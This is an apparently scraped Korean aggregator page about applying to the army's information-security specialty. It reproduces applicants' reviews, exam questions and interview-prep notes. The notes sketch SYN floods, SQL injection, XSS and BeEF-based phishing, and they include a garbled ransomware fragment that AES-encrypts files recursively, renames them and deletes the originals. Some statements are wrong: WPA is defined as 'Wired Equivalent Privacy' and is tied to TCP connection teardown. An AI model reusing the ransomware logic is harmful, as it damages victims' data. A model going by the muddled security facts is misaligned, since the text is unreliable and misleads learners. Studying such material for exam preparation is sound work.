정보 보호 병 후기 | 컴공은 꼭 군대를 여기로 가세요… (Feat. 정보보호병 / 소프트웨어개발병) 상위 269개 베스트 답변

당신은 주제를 찾고 있습니까 “정보 보호 병 후기 – 컴공은 꼭 군대를 여기로 가세요… (Feat. 정보보호병 / 소프트웨어개발병)“? 다음 카테고리의 웹사이트 https://you.charoenmotorcycles.com 에서 귀하의 모든 질문에 답변해 드립니다: https://you.charoenmotorcycles.com/blog. 바로 아래에서 답을 찾을 수 있습니다. 작성자 코딩하는거니 이(가) 작성한 기사에는 조회수 29,891회 및 좋아요 450개 개의 좋아요가 있습니다.

정보 보호 병 후기 주제에 대한 동영상 보기

여기에서 이 주제에 대한 비디오를 시청하십시오. 주의 깊게 살펴보고 읽고 있는 내용에 대한 피드백을 제공하세요!

d여기에서 컴공은 꼭 군대를 여기로 가세요… (Feat. 정보보호병 / 소프트웨어개발병) – 정보 보호 병 후기 주제에 대한 세부정보를 참조하세요

#정보보호병 #소프트웨어개발병 #컴퓨터공학 #군대

정보 보호 병 후기 주제에 대한 자세한 내용은 여기를 참조하세요.

육군 정보보호병 후기 – velog

육군 정보보호병에 지원해서 합격하게 되었습니다!저는 한림대학교 소프트웨어융합대학에 재학중이며 정보보안이나 해킹과는 거리가 좀 있는 사람 …

+ 여기에 보기

Source: velog.io

Date Published: 9/4/2022

View: 7080

[INFORMATION GUARD] 정보보호병 합격 후기 02 – BLOG

[INFORMATION GUARD] 정보보호병 합격 후기 01 오늘 2021년 05월 27일 필자의 군대 입대 프로젝트를 마쳤다. 코로나 시대… 정말 군대 가기 힘들다.

+ 여기를 클릭

Source: alltime-it.tistory.com

Date Published: 6/6/2021

View: 6255

육군 정보보호병 지원 후기 – 면접 문항 및 질문 정리 (2021.01.28)

본인은 아직 입대는 커녕 합격도 하지 않은 평범한 대학생이므로, 두 병과에 대해 더 자세히는 잘 알지 못한다. ‘정보보호병 후기’와 같은 키워드로 검색 …

+ 더 읽기

Source: syphon.tistory.com

Date Published: 7/30/2021

View: 4712

정보보호병 면접 후기 – Security Study

서류전형에서 획득한 가산점은 다음과 같다. 정보보호학과 2학년 1학기 수료 = 16점. 고교 출석률 결석 0일 = 10점. KISA 추천 동아리 활동 1 …

+ 여기에 자세히 보기

Source: sf-jam.tistory.com

Date Published: 5/16/2021

View: 288

정보보호병 후기 – 웹찢남

정보보호병 후기. harry595 2020. 9. 10. 01:25. 지난 포스팅에서 정보보호병 키워드로 검색을 해서 들어온 분들을 보고. 짧게나마 정보보호병 면접 부터 생활을 간단 …

+ 여기에 보기

Source: harry595.tistory.com

Date Published: 10/4/2021

View: 9221

[2020.06.15] 육군 정보보호병 면접 후기 – 사는 사람 이야기

지원 계기 정보보호병에 지원하기 전까지 나는 산업체를 알아보고 있었고 괜찮은 한 스타트업에서 병역특례를 받는 것을 조건으로 입사했었다.

+ 여기에 표시

Source: kaite-story.tistory.com

Date Published: 10/21/2022

View: 4827

2020.09.21 육군 정보보호병 면접 후기 – P&H_Station

코로나 사태로 인해서 2020.09.03이였던 정보보호병 면접이 2020.09.21로 미뤄지게 되었다. 이번 80회차 정보보호병은 14명을 모집하고, 1차 서류평가 …

+ 여기에 표시

Source: ludeno-studying.tistory.com

Date Published: 12/6/2021

View: 8383

2021.05.27 육군 정보보호병 2차(면접, 필기) 결과

다른 블로그도 보면 결과 발표일 아침 10시 쯤에 합격한 사람에게는 카톡으로 알림이 오는 것 같습니다. 후기. 저는 1차 때, 80명 중 51등으로 합격하여 …

+ 자세한 내용은 여기를 클릭하십시오

Source: filime.tistory.com

Date Published: 10/18/2021

View: 2893

주제와 관련된 이미지 정보 보호 병 후기

주제와 관련된 더 많은 사진을 참조하십시오 컴공은 꼭 군대를 여기로 가세요… (Feat. 정보보호병 / 소프트웨어개발병). 댓글에서 더 많은 관련 이미지를 보거나 필요한 경우 더 많은 관련 기사를 볼 수 있습니다.

컴공은 꼭 군대를 여기로 가세요... (Feat. 정보보호병 / 소프트웨어개발병)
컴공은 꼭 군대를 여기로 가세요… (Feat. 정보보호병 / 소프트웨어개발병)

주제에 대한 기사 평가 정보 보호 병 후기

  • Author: 코딩하는거니
  • Views: 조회수 29,891회
  • Likes: 좋아요 450개
  • Date Published: 2019. 12. 3.
  • Video Url link: https://www.youtube.com/watch?v=wTaug1FfFrk

육군 정보보호병 후기

육군 정보보호병에 지원해서 합격하게 되었습니다!

저는 소프트웨어융합대학에 재학중이며 정보보안이나 해킹과는 거리가 좀 있는 사람인데도 어느정도 상식을 쌓으니 합격시켜주었네요.

관련 지식은 네트워크관리사 2급이랑 정보처리기능사를 취득하며 어느정도 접해봤고, 그 외 문제를 좀 풀어보며 익히려고 노력했습니다.

합격 수기를 간단히 적어볼까 합니다.

과정

서류심사 (1차) 필기시험 (2차) 면접 (2차)

위와 같은 점수로 합격을 했습니다.

1차지원 같은 경우는 서류심사를 통해서 뽑고 2차는 대전충남지방병무청에 가서 필기시험과 면접 후에 최종 결과를 통보받을수 있었습니다.

서류에 관해서는 제가 딱히 드릴 말씀이 없습니다. 병무청 홈페이지에 들어가보시면 몇몇 자격증이 가선점을 주는데 저같은 경우는 동급 추가점수인 네트워크관리사나 정보처리기능사에 가산점이 붙고 다니는 학과에 추가점수를 받아 서류 34점으로 무난히 합격했습니다.

필기시험하고 면접을 준비한다고 상당히 애먹었는데 만약 정보보호병을 준비하시는 분들이 제 글을 본다면 조금 더 수월하게 준비할 수 있지 않을까 싶습니다.

필기 준비

필기는 무조건 정보보안기사 기출 풀어봐야 합니다.

보안기사에서 모든 문제가 다나옵니다.

기수가 틀려지면 모르겠지만 저같은 경우는 시험지에 10문제가 나왔고, 모두 보안 기사에서 한번씩은 본 문제들이여서 풀 수 있었습니다.

제가 보안기사 보면서 본 사이트 참조해드릴테니 다 보는건 현실적으로 무리가 있고 200문제 내지 300문제만 눈으로 훑어도 큰 도움이 되리라 확신합니다.

1~14회 보안기사 기출문제

다른 문제집 볼 필요 없이 계속 저것만 훑어보세요. 필기문제는 정말 저기서 갈라집니다.

평균적인 합격점수로 추론해봤을때 3~4문제 정도 맞추면 얼추 커트라인 이상으로 무난히 통과가 가능한 것 같습니다.

면접 준비

면접을 제가 참 고민을 많이 했습니다.

인터넷에 올라온 후기같은걸 보면 막 해킹기법 워터링 홀이 뭐냐, 브루트포스 어택을 아냐 이런씩으로 물어보시던데 이걸 그럼 다 외워가야하냐 생각이 막막했습니다.

면접은 총 두번에 걸쳐서 보는데, 한분은 군무원인거 같았고 한분은 대위이신것 같더라고요.

군무원 분은 만약 그룹간의 마찰이 생기면 어떻게 대처할 것인가, 또는 밤샘 근무할 일이 많을텐데 어떻게 대처할 것인가 이런 형식적인 질문을 하셨고 다수결에 따라서 어떻게 어떻게 할 것이다 라고 에둘러 대답하니 어찌저찌 넘어간 것 같습니다.

개인적인 생각으론 면접후에 핵심적인 질문은 대위님이 많이 하신 것 같았습니다.

대위님도 평범한 질문을 꽤 하셨는데, 그외에 제가 좀 핵심적으로 느낀 걸 꼽자면

로그를 아냐 아는 정보보안 장비가 있냐

이정도였습니다.

저는 막 복잡한 해킹기법 이야기하실줄 알고 준비를 꽤 많이 해갔는데 아쉽더라고요.

여기서 정말 임팩트있게 느낀건 아는 보안장비가 있냐는 질문이 나왔을 때 IPS랑 IDS를 말씀드리니 정말 눈이 틀려진 것 같았습니다. 간략히 설명하니 만족하셨던 것 같구요.

면접전에 공부한 이런 전문적인 지식을 내포하는게 핵심 포인트인 것 같습니다.

아래에 제가 면접 대비하며 정리해놓은 파일 기재할테니 참고하시면 좋을꺼같아요.

해킹 기법 정리

1.Syn/Ack Flood

코드출처: Normaltic

◉ client ack (클라이언트 데이터 보내기전 동기화 요청) ->server syn/ack(서버응답) -> client ack(클라이언트 응답)

◉ TCP접속을 성공시키기 위해 반드시 필요한 과정 – > 3way handshaking

◉ ack(응답)을 안보내니까 syn이 꽉차서 syn 백로그큐를 폭주시켜서 dinial of service 가 발생함

◉ FIN Flag를 이용한 4way handshaking 또한 존재

대응책

1.백로그큐 크기 늘림

2.신 쿠키 설정

3.방화벽에 임계치 설정

4.tcp 연결 과정 대기시간 줄임

DDOS 대응방안

◉ DOS공격이 맞는지 명확히 판단

◉ 형 파악 후 차단정책 근거 확보

◉ 차단정책 설정

◉ 공격대비/정책업데이트/좀비PC IP확보

◉ 막는법은 없고 서버 증설하거나 해당 ip를 서버에서 차단시킴 /서버 ip바꾸기/클라우드플레어

◉ 윈도우에서 iis(internet information service)에서 ip및 도메인 차단 들어가서 막기 시전

◉ 리눅스에서 root # route add -host [IP] reject

2.SQL Injection

Sql 질의문을 삽입하는 공격

◉ 정상 로그인

◉ 해커가 입력한 로그인

◉ where 절에서 and 조건은 or조건보다 선행되기 때문에 무조건 true값 리턴, 모든 데이터 출력되버림

◉ 대충 아이디 ~(SQL 질의문 추가)

◉ 정상적인 질의쿼리: select * from user where id=’[사용자ID]’

◉ 인젝션당한쿼리: select * from user where id=’[사용자ID]’~~~임의의 sql 구문

◉ blind/mass/union 등 다양한 변화형태 존재 blind->참거짓 리턴

◉ WAS(웹애플리케이션 서버) -> database

예: sql : {} 하나 사와

{} 빵

{} 빵 하나 사오고 건물 한채 계약해

DB에 임의의 SQL명령 실행(쉘까지 확보 가능)

DB의 데이터를 추출

인증 우회

DB 데이터 변조

◉ 악성 파일 업로드 가능 막는법: 쿼리와 관련된 코드를 죄다 필터링시켜서 시큐어 코딩

3.XSS Cross Site Scripting

진짜 간단히 말해서 이거.

대부분은 막아두지 근데 정말 보안 아예 안해둔 사이트는 안막아둠

보통은 이런씩으로 링크를 걸어서 알림창을 뜨게함

아스키코드로 위 실행명령을 변환시킨 뒤에 일부 웹서버는 필터링을 제대로 안해주므로 잘 통하는 경우가 있음

허점 즉, 취약점을 찾는 것이 중요함

워낙 변칙적이고 다 막기가 힘들어서 위험함

자바스크립트 형식으로 버튼/함수 응용가능

방지법

1.태그 써서 막기

2.필터링 등등..

xss 응용기법

◉ 칼리리눅스에서 xss를 응용한 BeEF 컨트롤 패널 등 사용가능

(browser exploitation framework project)

◉ 여기에 pretty theft 같은 기법이 있음( 홈페이지 똑같이 구현해서 가짜 홈페이지에 치게하고 로그따오는거)

4.RansomWare

import glob import os , random , struct from Cryptodome . Cipher import AES def encrypt_file ( key , in_filename , out_filename = None , chunksize = 64 * 1024 ) : if not out_filename : out_filename = in_filename + ‘.yankee’ iv = os . urandom ( 16 ) encryptor = AES . new ( key , AES . MODE_CBC , iv ) filesize = os . path . getsize ( in_filename ) with open ( in_filename , ‘rb’ ) as infile : with open ( out_filename , ‘wb’ ) as outfile : outfile . write ( struct . pack ( ‘ ‘ + filename ) encrypt_file ( key , filename ) os . remove ( filename ) for filename in glob . iglob ( startPath , recursive = True ) : if ( os . path . isfile ( filename ) ) : fname , ext = os . path . splitext ( filename ) if ( ext == ‘.enc’ ) : print ( ‘Decrypting> ‘ + filename ) decrypt_file ( key , filename ) os . remove ( filename )

5.WPA Crack

◉ 앞서 3 way handshake 가 세션을 연결하는 과정이었다면, 4 way handshake는 클라와 서버의 연결을 끊고 세션을 종료하는 과정임. 이 과정에서 해킹이 가능함

그 과정은 이러합니다.

◉ Fin wait -> close wait-> fin wait 2

◉ 여기서 time wait을 주는 이유는 Routing 지연이나 패킷 유실로 인한 재전송 등으로 인해 FIN패킷보다 늦게 도착하는 상황이 발생할 수 있기 때문

◉WPA란?

Wired Equivalent Privacy의 약자로 유선랜에 상당하는 Privacy를 제공하기 위한 알고리즘

◉ WEP를 보완하는 암호화 방식

WPA Version1, Vesion2가 있음

◉ 여기서 사용된 Aircrack-ng는 디텍터, 패킷 스니퍼, WEP와 [Wi-Fi Protected Aooo ccess|WPA]/WPA2-PSK 802.11 무선 LAN에 대한 크래커와 분석 도구가 탑재된 네트워크 소프트웨어이다.

IPS란?

침입 차단 시스템(侵入遮斷 – ,영어:Intrusion Prevention Systems (IPS), Intrusion Detection and Prevention Systems (IDPS)) 또는침입 방지 시스템은 외부네트워크로부터 내부 네트워크로 침입하는 네트워크패킷을 찾아 제어하는 기능을 가진소프트웨어또는하드웨어이다.

IBM Proventia, 윈스 Sniper IPS, Cisco 파이어파워, 티핑포인트 등

IDS란?

침입 탐지 시스템(Intrusion Detection System, IDS)은 일반적으로 시스템에 대한 원치 않는 조작을 탐지하여 준다. IDS는 매우 많은 종류들이 존재하며, 여기서는 그들 중 일부를 설명한다. 시스템에 대한 원치 않는 조작은 악의를 가진 숙련된해커또는 자동화된 툴을 사용하는스크립트 키디에 의한 공격의 형태로 행해질 수 있다

스노트나 브로같은게 ids 예

문제

클라이언트에서 서버로 쿠키를 보낼 때 사용하는 HTTP 헤더는?

-> set-cookie와 cookie 등의 선지가 있었다.

set-cookie, 중간에 개인정보 탈취등을 방지하기 위해 세션등이 사용됨 다음 중 전자상거래와 관련이 없는 것은?-> ebXML, SET, SSL, EMV가 선지였다.

ssl은 인터넷 데이터 암호화 기술 chmod 명령어의 특징이 아닌 것은?-> 파일과 디렉토리를 rename할 수 있다는 선지를 선택했다. HTTP 오류 코드와 그 뜻을 알맞게 짝지은 것이 아닌 것은?

-> 200, 403, 404, 500이 나왔다. 다음 중 입력값에 대한 검증 / 특수문자 처리를 하지 않은 것과 무관한 공격 기법은?

-> injection 기법 두세 종류와 ‘watering hole’이 나왔다. ‘watering hole’을 골랐다. watering hole : 워터링 홀 공격이란 공격대상이 자주 방문하는 홈페이지를 사전에 악성코드에 감염시킨 뒤 공격대상이 접속 할 때까지 잠복하면서 기다린다. 그리고 공격대상이 접속하면 비로서 공격을 시도하는 수법이다. 홈페이지에 접속하는 모든 사용자를 공격하기 때문에 접속하는 모든 사용자가 공격의 대상이 될 수 있다

◉ xss크로스사이트스크립트, 스크립트엔진 취약점과도 연관있음

리눅스 방화벽에서 ping에 대한 응답으로 ‘destination unreachable’을 리턴하기 위해 설정해야 하는 플래그는?

-> DENY, REJECT 등이 있었다. REJECT를 골랐다. 다음 화면은 어떤 명령어의 실행 결과인가? (ping 실행 화면)

-> 답이 ping이다 ㅋㅋ 다음 중 IPS에 대한 설명으로 올바르지 않은 것은? (그냥 IPS가 아니라 어플리케이션 뭐시기 IPS이었는데 기억이 안난다) 침해 단계의 심각성?에 따라 나열할 때, 빈칸에 들어갈 단어들은? (emergency에서 debug까지 나열되어 있었다.)

-> alert, info 등이 있었는데, 그냥 영어 할 줄만 알면 나열 가능하다

◉ 사고 전 준비 과정]→[사고 탐지]→[초기 대응]→[대응 전략 체계화]→[사고 조사]→[보고서 작성]→[해결]

침입이 있는데, 없다고 판단하는 경우는 뭐라고 하는가? (True/False Positive/Negative 중 선택)-> False Negative라고 답했는데, 맞을지 모르겠다.

◉ 1번

전자서명과 관련없는 프로토콜을 고르시오.

1. DSA

2. KCDSA

3. ECDSA

4. A5/3

=> 답 : 4

dsa가 digital signature algorithm 이므로 dsa붙은거 고르면된다.

◉ 2번

DB 보안으로서 적절하지 못한 자세는? (문제설명이 똑같지는 않지만 취지는 동일하다.)

1. 관리자를 최소한으로 만든다.

2. 로컬 계정으로 접속하는 것을 금지

3. Guest 계정으로 접속하는 것을 금지

4. 기억 안나는데 답은 아니였음

=> 답 : 2

​로컬 계정으로 접속하는게 안되면 뭐 다 안되지

◉ 3번

SIEM에서 사용되는 프로토콜로 적절하지 못한 것은?

1. Qrader

2. Arcsight

3. SPLUNK

4. beStorm

=> 답 : 4 (정답은 기억 안나는데 나머지 보기는 틀린 보기임)

​siem = sim(보안정보관리) + sem(보안이벤트관리)

◉ 4번

공개키와 대칭키 알고리즘을 사용하여 키교환을 하는 방식에서 제 3자가 해당 공개키를 인증할 수 있는 시스템은?

(문제설명이 똑같지는 않지만 취지는 동일하다.)

1. 키 분배 인증 센터

2. RSA ->공개키 암호시스템

3. Diffie Hellman

4. 기억 안남

=> 답 : 1

◉ 5번 문제 기억 안남

◉ 6번

파일 시스템 내에서 파일이나 디렉토리의 고유한 번호, 블록 정보 등이 담겨있는 파일은?

1. boot

2. data

3. i-node

4. 기억 안남

=> 답 : 3

◉ 7번

멀티 쓰레드나 멀티 프로세스에서 공유 자원을 여러 실행흐름이 접근하여 발생될 수 있는 취약점은?

1. buffer overflow 메모리 취약점 ->스택””은 해당버퍼에 할당된거보다 많이쓸때

2. Return to Library 라이브러리 함수 리턴

3. Race Condition ->상호배제,진행,한정대기

4. SQL Injection

=> 답 : 3

◉ 8번

웹 로그 파일에 기록되는 보기로 알맞지 않은 것을 고르시오.

1. IP 주소

2. 접속 시 Method

3. 접속 시 프로토콜

4. 접속 시 포트번호

=> 답 : 3 (정답이 정확하지는 않음 필자는 3번으로 적음)

◉ 9번

IDS가 수행되는 절차를 알맞게 배열한 보기를 고르시오.

=> 답 : [데이터 수집 -> 가공 -> 분석 -> 보고]

◉ 10번

TCP에서 4way HandShake의 연결 종료 과정에서 Seq와 ACK의 번호로 ㄱ, ㄴ, ㄷ, ㄹ에 알맞는 번호가 들어간 것을 고르시오.

=> 이 문제는 연결 종료 과정을 보여주면서 빈칸 기호와 번호가 일치하는 보기를 고르는 문제임. 답은 기억 안남

◉ strcpy 대신 strncpy를 사용하는 이유버퍼 오버플로우/scanf,getbyhostname등도 여기속함

◉ NMS가 확인할 수 없는 것호스트의 CPU 점유율

◉ 윈도우 공유 폴더 취약점(Null SessionIPC$

◉ TCP에서 클라이언트의 버퍼 오버플로우를 막기 위한 것흐름 제어

◉ crontab과 관련된 문제

◉ 사용자 인증 관련 문제최대 권한

◉ 다음 로그는 어떤 공격인가?랜드 공격(Land Attack)

◉ 디지털 포렌식에서 우선적으로 분석해야 하는 것레지스터

웹 대상으로 이루어지는 공격 시도를 막는 것웹 방화벽(WAF)

◉ 1. 파일 업로드 취약점을 묻는 문제 (단답식)

공격자는 서버 사이드 스크립트(PHP, JSP, .NET 등)을 이용하여 웹쉘(WebShell)을 제작

웹쉘(WebShell)은 원격에서 웹 서버를 제어하기 위한 목적으로 만들어졌으나, 지금은 웹쉘 = 악성코드라고 분류를 하여 안티 바이러스에서 탐지함

sql injection 과 다른점: 웹에서 노출되는 정보들을 하나씩 가져오는 sql injection 과 달리 파일 업로드 취약점은 웹쉘을 통해 시스템에 아예 침투하고 난 뒤 원하는 데이터들을 마음껏 가져오는 것

시큐어 코딩 – 소스코드 레벨 대응

◉ 2. 해시함수를 묻는 문제 (단답식)

임의의 길이를 갖는 임의의 데이터를 고정된 길이의 데이터로 매핑하는 함수를 말한다.

◉ 3. 메시지 인증코드를 묻는 문제 (단답식)

메시지 인증 코드(Message Authentication Code, 약칭 MAC)는메시지의 인증에 쓰이는 작은 크기의정보이다. MAC알고리즘은비밀 키를 입력받고, 임의-길이의 메시지를 인증한다.

◉ 4. 포맷 스트링 취약점을 묻는 문제 (답답식)

◉ 5. 운영체제 프로세스 상태 관련 문제 – 임계상태, 교착상태, 상호베재 등등 (객관식)

◉ 6. 포렌식 이미지 생성 프로그램을 묻는 문제 – nc, gz, tar, encase (객관식)

◉ 7. 로그 파일을 피해자 메일에 자동으로 전송하는 공격 프로그램을 묻는 문제 – 답 모름 ㅠㅠ (단답식)

◉ 8. VPN을 묻는 문제 (단답식)

◉ 9. OSI 7계층의 계층 중 설명에 대한 계층은 어느 계층인지 묻는 문제 (단답식)

면접준비

◉ CVE란 무엇입니까?

CVE(Common Vulnerabilities and Exposure)는 공개적으로 알려진 소프트웨어의 보안취약점을 가리키는 고유 표기를 뜻한

◉ APT 공격이 무엇입니까?

APT공격은 해커가 다양한 보안 위협을 만들어 특정 기업이나 조직의 네트워크에 지속적으로 가하는공격을 뜻한

◉ Zeroday공격이 무엇입니까?

제로 데이공격(또는 제로 데이 위협,Zero-DayAttack)은 컴퓨터 소프트웨어의 취약점을공격하는 기술적 위협으로, 해당 취약점에 대한 패치가 나오지 않은 시점에서 이루어지는공격을 말한다.

◉ 워러 크라이란 무엇입니까?

워너크라이(WannaCry) 또는워너크립트(WannaCrypt)[2],WanaCrypt0r 2.0는 2017년 5월 12일부터 등장한랜섬웨어멀웨어 툴이다. 2017년 5월 12일부터 대규모사이버 공격을 통해 널리 배포되었으며, 전세계 99개국의 컴퓨터 12만대 이상을 감염시켰다.[3][4]감염된 컴퓨터로는 20개의 언어로비트코인을 지급하면 풀어주겠다는 메시지를 띄웠다.

킬스위치 찾아냈고,방화벽이랑 인터넷 랜선꼽을때 유의하면 사전예방 가능

◉ 랜섬웨어란 무엇입니까?

랜섬웨어란 Ransom(몸값)과 Ware(제품)의 합성어로서 악성코드의 일종입니다. 해당 악성코드에 감염시컴퓨터 시스템에 접근이 제한되거나저장된 문서나 사진․동영상 파일이 암호화되어 사용할 수 없게 되며, 해커는 이에 대한 해제 대가로 금품을 요구합니다.

최근 이스라엘 보안 기업 만든 스파이웨어 페가수스가 애플뚫음

브루트 포스(무차별 대입 공격) 언급하며 그걸로도 몇백년 걸리는걸 뚫은게 대단하다고 생각함

기타 자료

TCP의 4-way Handshaking 과정

[STEP 1]

클라이언트가 연결을 종료하겠다는 FIN플래그를 전송한다. 이때A클라이언트는 FIN-WAIT상태가 된다.

[STEP 2]

B서버는 FIN플래그를 받고, 일단 확인메시지 ACK 보내고 자신의 통신이 끝날때까지 기다리는데 이 상태가

B서버의 CLOSE_WAIT상태다.

[STEP 3]

연결을 종료할 준비가 되면, 연결해지를 위한 준비가 되었음을 알리기 위해 클라이언트에게 FIN플래그를 전송한다. 이때 B서버의 상태는 LAST-ACK이다.

[STEP 4]

클라이언트는 해지준비가 되었다는 ACK를 확인했다는 메시지를 보낸다.

A클라이언트의 상태가 FIN-WAIT ->TIME-WAIT 으로 변경된다.

그런데 만약 “Server에서 FIN을 전송하기 전에 전송한 패킷이 Routing 지연이나 패킷 유실로 인한 재전송 등으로 인해 FIN패킷보다 늦게 도착하는 상황”이 발생한다면 어떻게 될까요?

Client에서 세션을 종료시킨 후 뒤늦게 도착하는 패킷이 있다면 이 패킷은 Drop되고 데이터는 유실될 것입니다.

A클라이언트는 이러한 현상에 대비하여 Client는 Server로부터 FIN을 수신하더라도 일정시간(디폴트 240초) 동안 세션을 남겨놓고 잉여 패킷을 기다리는 과정을 거치게 되는데이 과정을”TIME_WAIT”라고 합니다. 일정시간이 지나면, 세션을 만료하고 연결을 종료시키며,”CLOSE”상태로 변화합니다.

방화벽과 ips/ids 차이

ips/ids 차이

◉ 패킷

패킷의 구성요소

1) 헤더(Header)동기 신호 플래그, 전송지 주소, 목적지 주소, 순차 번호 등패킷에는 프로토콜의 다양한 정보들이 헤더에 기록되는데, 프로토콜에 따라 다름.

2) 데이터(Data)데이터 부분에는 실제로 전송될 내용이 있음.

3) 트레일러(Trailer)수신 측에서는 전송 중에 데이터가 손상되었는지 알 수 있음.

예) 전송 에러 검사 항목 CRC(Cyclic Redundancy Check)

OSI 7계층

Ids 침입탐지유형

◉ NIDS (네트워크 침입 감지 시스템)

◉ 호스트 침입 탐지 시스템 (HIDS)

SQL과 Blind SQL의 차이는?

◉ Sql인젝션은 쿼리를 삽입해 원하는 데이터를 한번에 얻어냄

◉ Blind sql인젝션은 쿼리가 참일때와 거짓일때의 반응으로만 데이터를 알아냄

Setuid가 뭔가요

◉ 리눅스 특수권한 중 하나로 루트유저 엑세스 파일에 일반유저가 접근하게끔 허가

◉ 8진수 4000이 비트

◉ Setgid는 8진수 2000

◉ 커널에 내장된 툴로써 패킷 필터링, connection tracking

iptables

john the ripper

브루트포스

리눅스 설정 파일/ 임시파일/ 물리적 장치

etc/tmp/dev

퍼온 정보도 많습니다

혹시 원작자이시거나 불편하신 점이 있다면 댓글에 적어주세요

정보보호병이 나름 정예병이나, SW개발병에 비하면 나름 문턱도 작고 준비만 열심히 한다면 충분히 시도해 볼만한 보직인 것 같습니다.

필자도 보안에 관련해서는 모르는 부분이 정말 많지만, 적당한 공부를 통해 합격할 수 있었네요.

아직 훈련소도 들어가보지 못했고 사령부에 배치받을지 사단급에 배치받을지도 모르지만,

아무런 생각없이 군생활 하는 것보다 특기를 살려서 하는 편이 훨씬 낫다는 확신이 듭니다.

겁내지 말고 도전해보면 뭐라도 주는것 같아요 ㅋㅋ

앞으로 정보보호병을 하며 얻게된 경험이나 일 또한 기밀을 제외하고 기재할 기회가 있길 바랍니다.

[INFORMATION GUARD] 정보보호병 합격 후기 02

728×90

위 파트와 이어서 작성되는 글이며,

정보보호병 2차 시험의 관한 글이다.

만약에 이 글을 읽는 사람이 있으면 꼭 도움이 됐으면 좋겠다.

정보보호병 2차

정보보호병 2차 시험은 필기 및 면접이다.

병무청 도착 후 번호표를 뽑게 되는데 필자는 1시간 30분 정도를 일찍 도착했다.

하지만, 60/80 번 정도의 순서를 받았다.

필자가 시험을 본 당시에는 필기시험을 보는 장소와 면접을 보는 장소가

따로 있었으며,

필기 -> 면접 순으로 진행되었다.

필자는 부모님께서 데려다주셔서 정말 다행이었지만, 기차를 이용하는

분들은 조금 빨리 가서 번호표를 일찍 뽑아야 될 것 같다. (막차 끊기기 전에!)

정말 진심으로 급하신 분들은 앞으로 당겨주기도 하시는데,

웬만해서는 힘들 것 같다.

– 필기

솔직히 필기.. 필자의 입장에서는 정말 많이 어려웠다.

그 당시 블로그에 정리할 수 있도록 문제를 외웠는데,

시험이 끝나고 나니 다 까먹었다…

하지만, 이거는 정말 확실하다.

[시스템 지식] / [네트워크 지식] / [접근제어 지식]

이렇게 3 분야의 파트는 반드시 공부해야 한다.

저렇게 말해버리면 분야가 너무 넓은데.. 쉽게 정보보호 기사 시험을 준비한다고

생각하면 될 것 같다.

필자가 기억나는 문제는 시스템 해킹 기법을 설명해주고

해킹 기법 이름이 무엇인지 고르는 것

4-way-handshaking SYN과 ACK번호를 고르는 것이다.

필자는 기사시험 책을 구매해서 봤다.

솔직히 필자에게는 큰 도움이 되지 않았다.

공부도 열심히 하지 않았고, 기본지식으로 시험 봤기 때문이다.

(이런 마인드로 공부해서 시험이 어렵게 느껴졌나 보다..)

필자가 시험을 본 시기에는 총 10문제가 출제되었다.

볼펜으로 문제를 응시하며, 볼펜을 가져가지 않을 경우 시험실에서 제공해준다.

정보보호병 2차 필기는

정보보호기사 필기시험을 응시한다고

생각하자!

– 면접

면접은 기술면접과 인성면접으로 나눠져 있다.

필자 시기에는 1 대 1로 진행했다.

또한, 필자는 자소서를 위주로 면접을 준비했다.

그 이유는 필자 동아리 선배님들 중에 정보보호병에 합격하신

분들이 있었는데, 선배님들은 자소서 위주로 질문 받으셨다고 알려주셨다.

필자는 자소서를 보며, 필자가 직접 예상 질문을 만들어 봤다.

위 링크는 필자가 작성한 자료이다.

필자는 서치를 통해 인성면접에서 나올 수 있는 예상 질문들을 뽑아보고

예상 답변을 작성했다.

필자의 경우 기술면접 후 인성면접을 실시했다.

[기술면접]

솔직히 자소서 대로 안 물어봤다.

똑똑하고 들어가니 면접관님께서는 너무 힘드셨는지 눈도 안 마주치시고

다리 주무르고 계셨다.

필자는 힘드신 것을 눈치채고 또박또박 말하려고 노력했고,

필자에게 집중시키기 위해 노력했다.

먼저 들어가면 지원동기를 물어본다.

이후 필자에게는 해킹대회 경력이 있냐고 물어보셨다.

필자는 Defenit CTF 참여 해본적이 있다고 대답했고,

동아리 선배님께서 문제를 제일 빨리 푸신(퍼스트 블러드) 얘기를 했다.

해킹대회 이야기를 하니 면접관님 눈이 반짝해지셨다.

다음 질문그렇다면 또 다른 관심 있는 분야가 있을까요?

드디어 기회다!! 필자의 필살기를 던질 수 있는 기회

한 사람당 말할 수 있는 시간이 별로 없기 때문에, TMI 식으로 모든 필살기를 던졌다.

– 보안의 매력을 느끼기 시작한 포너블 언급

– 첫 해킹인 ARP SPOOFING을 말하며, 네트워크 언급

– 가고 싶은 회사는 토스이고, 직접 토스 보안팀 직원을 만나 얘기했으며,

이 과정에서 토스가 웹뷰인 것을 알았고, 웹 언급

– 토스도 웹뷰이지만, 모바일 서비스이기 때문에, 모바일 언급

크게 이 4 가지를 언급했으며, 기술 질문 모두 위 4 가지와

관련된 질문을 해주셨다.

이렇게 되면 너무 감사한 상황! 자신 있게 대답했다.

많은 질문을 주셨는데, 가장 기억에 남는 질문은

ARP SPOOFING과 관련된 질문이다.

면접관님께서는 직접 ARP SPOOFING을 만들어본 경험에 대해

물어보셨고, 필자는 프로젝트로 PYTHON으로 간단하게 프로그래밍

했다고 대답했다.

이와 더불어 필자가 진행한 다른 프로젝트도 언급할 수 있었다.

이렇게 되면, 필살기를 추가 어필할 수 있으며,

필자가 준비를 많이 했다는 것을 어필할 수 있고, 꼬리를 물고

필자에게 질문하게 만들 수 있다.

(꼬리 질문이지만, 필자가 경험한 대로 대답하면 되기 때문에 너무 유리한 상황)

면접은 “면접왕 이형” 유튜브 채널을 강력 추천한다.

뭔가 이 분 영상을 보고 이미지 트레이닝을 하면 잘할 것 같다는

자신감이 번쩍 든다.

이분 영상들을 잘 살펴보면 필살기를 던져 내가 말한 필살기에서 면접관이

질문할 수 있도록 하라고 강조한다.

여기서 말하는 필사 기는 본인이 했던 가장 잘한 프로젝트 및 활동 같은 느낌이며,

내가 말한 필살기에서 질문할 수 있도록 하여 면접 질문을 제한하는 방법이다.

[인성면접]

솔직히 서치를 해보니 가족관계의 대해 묻는다고 했다.

필자 시기에는 지원동기 및

“군대가 왜 있을까요?” / “본인 경험 중 힘들었을 때와 좋았을 때를 말해보세요”

3 가지 질문을 받았으며, 지원동기는 기술면접 때와 같이 말했다.

필자는 너무 당황스러워서 군대 존재 이유 질문에는

나라를 지키고 국민들을 보호하기 위해 존재한다고 대답했다.

자! 드디어 2 번째 질문

“본인 경험 중 힘들었을 때와 좋았을 때를 말해보세요”

인성면접이지만, 보안의 대한 질문을 하실 수 있게끔 하려고 했지만

그냥 네~ 하고 끝났다.

